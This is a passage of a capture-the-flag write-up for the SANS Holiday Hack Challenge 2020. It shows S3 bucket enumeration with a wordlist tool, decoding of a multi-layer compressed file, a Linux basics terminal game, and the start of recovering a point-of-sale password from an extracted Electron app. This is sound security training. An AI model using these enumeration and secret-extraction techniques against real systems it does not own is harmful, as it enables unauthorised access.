&lt;span class="go"&gt;tool help using the man command. Search all man pages for a string such as&lt;/span&gt;
&lt;span class="go"&gt;a file extension using the apropos command.&lt;/span&gt;
&lt;span class="go"&gt;To see this help again, run cat /etc/motd.&lt;/span&gt;
&lt;span class="gp"&gt;elf@34d399b25d38:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We must help Shinny find Santa's assets in the cloud. Let's explore the file
system:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2b6fbc08838a:~$&lt;/span&gt; ls
&lt;span class="go"&gt;TIPS  bucket_finder&lt;/span&gt;
&lt;span class="gp"&gt;elf@2b6fbc08838a:~$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; bucket_finder/
&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder$&lt;/span&gt; ls
&lt;span class="go"&gt;README  bucket_finder.rb  wordlist&lt;/span&gt;
&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder$&lt;/span&gt; ./bucket_finder.rb --help
&lt;span class="go"&gt;bucket_finder 1.0 Robin Wood (robin@digininja.org) (www.digininja.org)&lt;/span&gt;
&lt;span class="go"&gt;Usage: bucket_finder [OPTION] ... wordlist&lt;/span&gt;
&lt;span class="go"&gt;        --help, -h: show help&lt;/span&gt;
&lt;span class="go"&gt;        --download, -d: download the files&lt;/span&gt;
&lt;span class="go"&gt;        --log-file, -l: filename to log output to&lt;/span&gt;
&lt;span class="go"&gt;        --region, -r: the region to use, options are:&lt;/span&gt;
&lt;span class="go"&gt;                                        us - US Standard&lt;/span&gt;
&lt;span class="go"&gt;                                        ie - Ireland&lt;/span&gt;
&lt;span class="go"&gt;                                        nc - Northern California&lt;/span&gt;
&lt;span class="go"&gt;                                        si - Singapore&lt;/span&gt;
&lt;span class="go"&gt;                                        to - Tokyo&lt;/span&gt;
&lt;span class="go"&gt;        -v: verbose&lt;/span&gt;
&lt;span class="go"&gt;        wordlist: the wordlist to use&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We have a script, &lt;code&gt;bucket_finder&lt;/code&gt;, which takes a wordlist, and tries to
see if it's the name of a valid AWS S3 bucket. Let's take a look at the
wordlist:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder$&lt;/span&gt; cat wordlist
&lt;span class="go"&gt;kringlecastle&lt;/span&gt;
&lt;span class="go"&gt;wrapper&lt;/span&gt;
&lt;span class="go"&gt;santa&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Only three words. Looking at the earlier message of the day, we see that the
elves use something called &lt;code&gt;Wrapper3000&lt;/code&gt;. Let's add it to the wordlist,
and launch the script.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; wrapper3000 &amp;gt;&amp;gt; wordlist
&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder$&lt;/span&gt; ./bucket_finder.rb ./wordlist
&lt;span class="go"&gt;http://s3.amazonaws.com/kringlecastle&lt;/span&gt;
&lt;span class="go"&gt;Bucket found but access denied: kringlecastle&lt;/span&gt;
&lt;span class="go"&gt;http://s3.amazonaws.com/wrapper&lt;/span&gt;
&lt;span class="go"&gt;Bucket found but access denied: wrapper&lt;/span&gt;
&lt;span class="go"&gt;http://s3.amazonaws.com/santa&lt;/span&gt;
&lt;span class="go"&gt;Bucket santa redirects to: santa.s3.amazonaws.com&lt;/span&gt;
&lt;span class="go"&gt;http://santa.s3.amazonaws.com/&lt;/span&gt;
&lt;span class="go"&gt;        Bucket found but access denied: santa&lt;/span&gt;
&lt;span class="go"&gt;http://s3.amazonaws.com/wrapper3000&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Bucket Found: wrapper3000 ( http://s3.amazonaws.com/wrapper3000 )&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;        &amp;lt;Public&amp;gt; http://s3.amazonaws.com/wrapper3000/package&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We have found our package! Let's download it using &lt;code&gt;bucket_finder&lt;/code&gt;'s
&lt;code&gt;--download&lt;/code&gt; option:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder$&lt;/span&gt; ./bucket_finder.rb -d ./wordlist
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt;http://s3.amazonaws.com/wrapper3000&lt;/span&gt;
&lt;span class="go"&gt;Bucket Found: wrapper3000 ( http://s3.amazonaws.com/wrapper3000 )&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;        &amp;lt;Downloaded&amp;gt; http://s3.amazonaws.com/wrapper3000/package&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's see what we got:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; wrapper3000/
&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; ls
&lt;span class="go"&gt;package&lt;/span&gt;
&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; file package
&lt;span class="go"&gt;package: ASCII text, with very long lines&lt;/span&gt;
&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; cat package
&lt;span class="go"&gt;UEsDBAoAAAAAAIAwhFEbRT8anwEAAJ8BAAAcABwAcGFja2FnZS50eHQuWi54ei54eGQudGFyLmJ6MlVUCQADoBfKX6&lt;/span&gt;
&lt;span class="go"&gt;AXyl91eAsAAQT2AQAABBQAAABCWmg5MUFZJlNZ2ktivwABHv+Q3hASgGSn//AvBxDwf/xe0gQAAAgwAVmkYRTKe1PV&lt;/span&gt;
&lt;span class="go"&gt;M9U0ekMg2poAAAGgPUPUGqehhCMSgaBoAD1NNAAAAyEmJpR5QGg0bSPU/VA0eo9IaHqBkxw2YZK2NUASOegDIzwMXM&lt;/span&gt;
&lt;span class="go"&gt;HBCFACgIEvQ2Jrg8V50tDjh61Pt3Q8CmgpFFunc1Ipui+SqsYB04M/gWKKc0Vs2DXkzeJmiktINqjo3JjKAA4dLgLt&lt;/span&gt;
&lt;span class="go"&gt;PN15oADLe80tnfLGXhIWaJMiEeSX992uxodRJ6EAzIFzqSbWtnNqCTEDML9AK7HHSzyyBYKwCFBVJh17T636a6Ygyj&lt;/span&gt;
&lt;span class="go"&gt;X0eE0IsCbjcBkRPgkKz6q0okb1sWicMaky2Mgsqw2nUm5ayPHUeIktnBIvkiUWxYEiRs5nFOM8MTk8SitV7lcxOKst&lt;/span&gt;
&lt;span class="go"&gt;2QedSxZ851ceDQexsLsJ3C89Z/gQ6Xn6KBKqFsKyTkaqO+1FgmImtHKoJkMctd2B9JkcwvMr+hWIEcIQjAZGhSKYNP&lt;/span&gt;
&lt;span class="go"&gt;xHJFqJ3t32Vjgn/OGdQJiIHv4u5IpwoSG0lsV+UEsBAh4DCgAAAAAAgDCEURtFPxqfAQAAnwEAABwAGAAAAAAAAAAA&lt;/span&gt;
&lt;span class="go"&gt;AKSBAAAAAHBhY2thZ2UudHh0LloueHoueHhkLnRhci5iejJVVAUAA6AXyl91eAsAAQT2AQAABBQAAABQSwUGAAAAAA&lt;/span&gt;
&lt;span class="go"&gt;EAAQBiAAAA9QEAAAAA&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This looks like base64 encoded data. Let's decode it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; base64 -d &amp;lt; package &amp;gt; package_decoded
&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; file package_decoded
&lt;span class="go"&gt;package_decoded: Zip archive data, at least v1.0 to extract&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The decoded data seems to be a ZIP archive. Let's rename the file and unzip it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; mv package_decoded&lt;span class="o"&gt;{&lt;/span&gt;,.zip&lt;span class="o"&gt;}&lt;/span&gt;
&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; unzip package_decoded.zip
&lt;span class="go"&gt;Archive:  package_decoded.zip&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt; extracting: package.txt.Z.xz.xxd.tar.bz2&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Wow, this package seems to have been wrapped in lots of layers of compression.
Let's start with the last extensions, the &lt;code&gt;.tar.bz2&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; tar xjf package.txt.Z.xz.xxd.tar.bz2
&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; cat package.txt.Z.xz.xxd
&lt;span class="go"&gt;00000000: fd37 7a58 5a00 0004 e6d6 b446 0200 2101  .7zXZ......F..!.&lt;/span&gt;
&lt;span class="go"&gt;00000010: 1600 0000 742f e5a3 0100 2c1f 9d90 4ede  ....t/....,...N.&lt;/span&gt;
&lt;span class="go"&gt;00000020: c8a1 8306 0494 376c cae8 0041 054d 1910  ......7l...A.M..&lt;/span&gt;
&lt;span class="go"&gt;00000030: 46e4 bc99 4327 4d19 8a06 d984 19f3 f08d  F...C&amp;#39;M.........&lt;/span&gt;
&lt;span class="go"&gt;00000040: 1b10 45c2 0c44 a300 0000 0000 c929 dad6  ..E..D.......)..&lt;/span&gt;
&lt;span class="go"&gt;00000050: 64ef da24 0001 452d 1e52 57e8 1fb6 f37d  d..$..E-.RW....}&lt;/span&gt;
&lt;span class="go"&gt;00000060: 0100 0000 0004 595a                      ......YZ&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;.xxd&lt;/code&gt; file seems to be a binary representation of the original file,
generated with &lt;code&gt;xxd -c 16&lt;/code&gt;. We can decode it using &lt;code&gt;xxd -r -c 16&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; xxd -r -c &lt;span class="m"&gt;16&lt;/span&gt; &amp;lt; package.txt.Z.xz.xxd &amp;gt; package.txt.Z.xz
&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; file package.txt.Z.xz
&lt;span class="go"&gt;package.txt.Z.xz: XZ compressed data&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have XZ compressed data. We can use &lt;code&gt;unxz&lt;/code&gt; to decompress it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; unxz package.txt.Z.xz
&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; file package.txt.Z
&lt;span class="go"&gt;package.txt.Z: compress&amp;#39;d data 16 bits&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally, we have a file that seems to have been compressed, using the
&lt;a class="reference external" href="https://en.wikipedia.org/wiki/Compress"&gt;compress&lt;/a&gt; command. We can use
&lt;code&gt;uncompress&lt;/code&gt; to retrieve the original file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; uncompress package.txt.Z
&lt;span class="gp"&gt;elf@2b6fbc08838a:~/bucket_finder/wrapper3000$&lt;/span&gt; cat package.txt
&lt;span class="hll"&gt;&lt;span class="go"&gt;North Pole: The Frostiest Place on Earth&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We finally get the content of the file, &lt;code&gt;North Pole: The Frostiest Place on Earth&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-3"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id6"&gt;Objective 3:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="sugarplum-mary-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id7"&gt;Sugarplum Mary's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;pre class="literal-block"&gt;
The North Pole 🍭 Lollipop Maker:
All the lollipops on this system have been stolen by munchkins. Capture munchkins by following instructions here and 🍭's will appear in the green bar below. Run the command &amp;quot;hintme&amp;quot; to receive a hint.



───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

Type &amp;quot;yes&amp;quot; to begin:
&lt;/pre&gt;
&lt;p&gt;This terminal is a Linux challenge where we have to prove that we have a basic
understanding of common Linux commands. Let's start:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
Perform a directory listing of your home directory to find a munchkin and retrieve a lollipop!
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~$&lt;/span&gt; ls
&lt;span class="go"&gt;HELP  munchkin_19315479765589239  workshop&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Now find the munchkin inside the munchkin.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~$&lt;/span&gt; cat munchkin_19315479765589239
&lt;span class="go"&gt;munchkin_24187022596776786&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Great, now remove the munchkin in your home directory.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~$&lt;/span&gt; rm munchkin_19315479765589239
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Print the present working directory using a command.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~$&lt;/span&gt; &lt;span class="nb"&gt;pwd&lt;/span&gt;
&lt;span class="go"&gt;/home/elf&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Good job but it looks like another munchkin hid itself in you home directory. Find the hidden munchkin!
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~$&lt;/span&gt; ls -a
&lt;span class="go"&gt;.  ..  .bash_history  .bash_logout  .bashrc  .munchkin_5074624024543078  .profile  HELP  workshop&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Excellent, now find the munchkin in your command history.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~$&lt;/span&gt; grep -i munchkin .bash_history
&lt;span class="go"&gt;echo munchkin_9394554126440791&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Find the munchkin in your environment variables.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~$&lt;/span&gt; &lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; grep -i munchkin
&lt;span class="go"&gt;SESSNAME=&amp;#39;Munchkin Wrangler&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;z_MUNCHKIN=munchkin_20249649541603754&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Next, head into the workshop.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; workshop/
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
A munchkin is hiding in one of the workshop toolboxes. Use &amp;quot;grep&amp;quot; while ignoring case to find which toolbox the munchkin is in.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop$&lt;/span&gt; grep -i munchkin *
&lt;span class="go"&gt;grep: electrical: Is a directory&lt;/span&gt;
&lt;span class="go"&gt;toolbox_191.txt:mUnChKin.4056180441832623&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
A munchkin is blocking the lollipop_engine from starting. Run the lollipop_engine binary to retrieve this munchkin.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop$&lt;/span&gt; ls -l ./lollipop_engine
&lt;span class="go"&gt;-r--r--r-- 1 elf elf 5692640 Dec 10 18:19 ./lollipop_engine&lt;/span&gt;
&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop$&lt;/span&gt; chmod +x ./lollipop_engine
&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop$&lt;/span&gt; ./lollipop_engine
&lt;span class="go"&gt;munchkin.898906189498077&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Munchkins have blown the fuses in /home/elf/workshop/electrical. cd into electrical and rename blown_fuse0 to fuse0.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; electrical/
&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop/electrical$&lt;/span&gt; mv blown_fuse0 fuse0
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Now, make a symbolic link (symlink) named fuse1 that points to fuse0
&lt;/pre&gt;
&lt;p&gt;I &lt;strong&gt;never&lt;/strong&gt; remember the order of the arguments for &lt;code&gt;ln&lt;/code&gt; and always
have to check it up:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop/electrical$&lt;/span&gt; ln -s ./fuse0 ./fuse1
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Make a copy of fuse1 named fuse2.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop/electrical$&lt;/span&gt; cp ./fuse1 ./fuse2
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
We need to make sure munchkins don't come back. Add the characters &amp;quot;MUNCHKIN_REPELLENT&amp;quot; into the file fuse2.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop/electrical$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; MUNCHKIN_REPELLENT &amp;gt; ./fuse2
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Find the munchkin somewhere in /opt/munchkin_den.
&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;-type f&lt;/code&gt; specifies that we are looking for a file. The
&lt;code&gt;-iname&lt;/code&gt; argument is used to perform a case-insensitive search on the
name.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop/electrical$&lt;/span&gt; find /opt/munchkin_den/ -type f -iname &lt;span class="s1"&gt;&amp;#39;*munchkin*&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;/opt/munchkin_den/apps/showcase/src/main/resources/mUnChKin.6253159819943018&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Find the file somewhere in /opt/munchkin_den that is owned by the user munchkin.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop/electrical$&lt;/span&gt; find /opt/munchkin_den/ -user munchkin
&lt;span class="go"&gt;/opt/munchkin_den/apps/showcase/src/main/resources/template/ajaxErrorContainers/niKhCnUm_9528909612014411&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Find the file created by munchkins that is greater than 108 kilobytes and less than 110 kilobytes located somewhere in /opt/munchkin_den.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop/electrical$&lt;/span&gt; find /opt/munchkin_den/ -size +108k -size -110k
&lt;span class="go"&gt;/opt/munchkin_den/plugins/portlet-mocks/src/test/java/org/apache/m_u_n_c_h_k_i_n_2579728047101724&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
List running processes to find another munchkin.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop/electrical$&lt;/span&gt; ps aux &lt;span class="p"&gt;|&lt;/span&gt; grep -i munchkin
&lt;span class="go"&gt;elf      16735  0.7  0.0  84316 26016 pts/2    S+   12:13   0:00 /usr/bin/python3 /14516_munchkin&lt;/span&gt;
&lt;span class="go"&gt;elf      17668  0.0  0.0  13240  1068 pts/3    S+   12:14   0:00 grep --color=auto -i munchkin&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
The 14516_munchkin process is listening on a tcp port. Use a command to have the only listening port display to the screen.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop/electrical$&lt;/span&gt; ss -tlpn
&lt;span class="hll"&gt;&lt;span class="go"&gt;bash: ss: command not found&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;What? No &lt;code&gt;ss&lt;/code&gt;?! Let's do it the old fashioned way:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop/electrical$&lt;/span&gt; netstat -tlpn
&lt;span class="go"&gt;(Not all processes could be identified, non-owned process info&lt;/span&gt;
&lt;span class="go"&gt; will not be shown, you would have to be root to see it all.)&lt;/span&gt;
&lt;span class="go"&gt;Active Internet connections (only servers)&lt;/span&gt;
&lt;span class="go"&gt;Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name&lt;/span&gt;
&lt;span class="go"&gt;tcp        0      0 0.0.0.0:54321           0.0.0.0:*               LISTEN      16735/python3&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
The service listening on port 54321 is an HTTP server. Interact with this server to retrieve the last munchkin.
&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop/electrical$&lt;/span&gt; curl http://localhost:54321
&lt;span class="go"&gt;munchkin.73180338045875&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Your final task is to stop the 14516_munchkin process to collect the remaining lollipops.
&lt;/pre&gt;
&lt;p&gt;From the result of the earlier &lt;code&gt;netstat&lt;/code&gt; command, we see that the PID of
the process is 16735:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c339776b4a9d:~/workshop/electrical$&lt;/span&gt; &lt;span class="nb"&gt;kill&lt;/span&gt; -9 &lt;span class="m"&gt;16735&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;pre class="literal-block"&gt;
Congratulations, you caught all the munchkins and retrieved all the lollipops!
&lt;/pre&gt;
&lt;/div&gt;
&lt;div class="section" id="point-of-sale-password-recovery"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id8"&gt;Point-of-Sale Password Recovery&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;When we try to interact with the Point-of-Sale, we're greeted by a message
saying it's locked, and offering to download an offline version:&lt;/p&gt;
&lt;img alt="pos_locked.png" class="align-center" src="/images/sans-christmas-challenge-2020/pos_locked.png" /&gt;
&lt;p&gt;You can download the offline version &lt;a class="reference external" href="https://download.holidayhackchallenge.com/2020/santa-shop/santa-shop.exe"&gt;here&lt;/a&gt;
(make sure you run it into a Virtual Machine, don't run random executable files
you find on the Internet, stay safe, wear a mask and wash your hands).&lt;/p&gt;
&lt;p&gt;So, let's run the executable:&lt;/p&gt;
&lt;img alt="pos_auto_extract.png" class="align-center" src="/images/sans-christmas-challenge-2020/pos_auto_extract.png" /&gt;
&lt;p&gt;Hmm, it seems to be an auto-extracting archive. Let's see where the files are
extracted. We can do so by opening task manager, right clicking on the process
and select &amp;quot;Open file location&amp;quot;:&lt;/p&gt;
&lt;img alt="pos_task_manager.png" class="align-center" src="/images/sans-christmas-challenge-2020/pos_task_manager.png" /&gt;
&lt;p&gt;The files are extracted in the &lt;code&gt;%LOCALAPPDATA%\Programs\santa-shop&lt;/code&gt;:&lt;/p&gt;
&lt;img alt="pos_extracted_files.png" class="align-center" src="/images/sans-christmas-challenge-2020/pos_extracted_files.png" /&gt;
&lt;p&gt;We can now access the resources of the program. Let's interact a bit with the
application, for example by entering an incorrect password:&lt;/p&gt;
&lt;img alt="pos_invalid_password.png" class="align-center" src="/images/sans-christmas-challenge-2020/pos_invalid_password.png" /&gt;
&lt;p&gt;We get the message &lt;code&gt;Invalid password!&lt;/code&gt;. Let's search for this string
in the program resources:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -aR &lt;span class="s1"&gt;&amp;#39;Invalid password!&amp;#39;&lt;/span&gt; ./santa-shop/
&lt;span class="go"&gt;./santa-shop/resources/app.asar:      document.getElementById(&amp;#39;password-message&amp;#39;).innerText = &amp;#39;Invalid password!&amp;#39;;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The file &lt;code&gt;resources/app.asar&lt;/code&gt; is a match! Let's open it and see the code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;checkPassword&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;event&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;event&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;preventDefault&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

